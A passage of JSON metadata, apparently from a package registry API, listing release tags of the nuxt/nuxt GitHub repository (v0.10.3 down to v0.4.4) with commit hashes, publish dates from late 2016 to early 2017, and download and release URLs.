:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G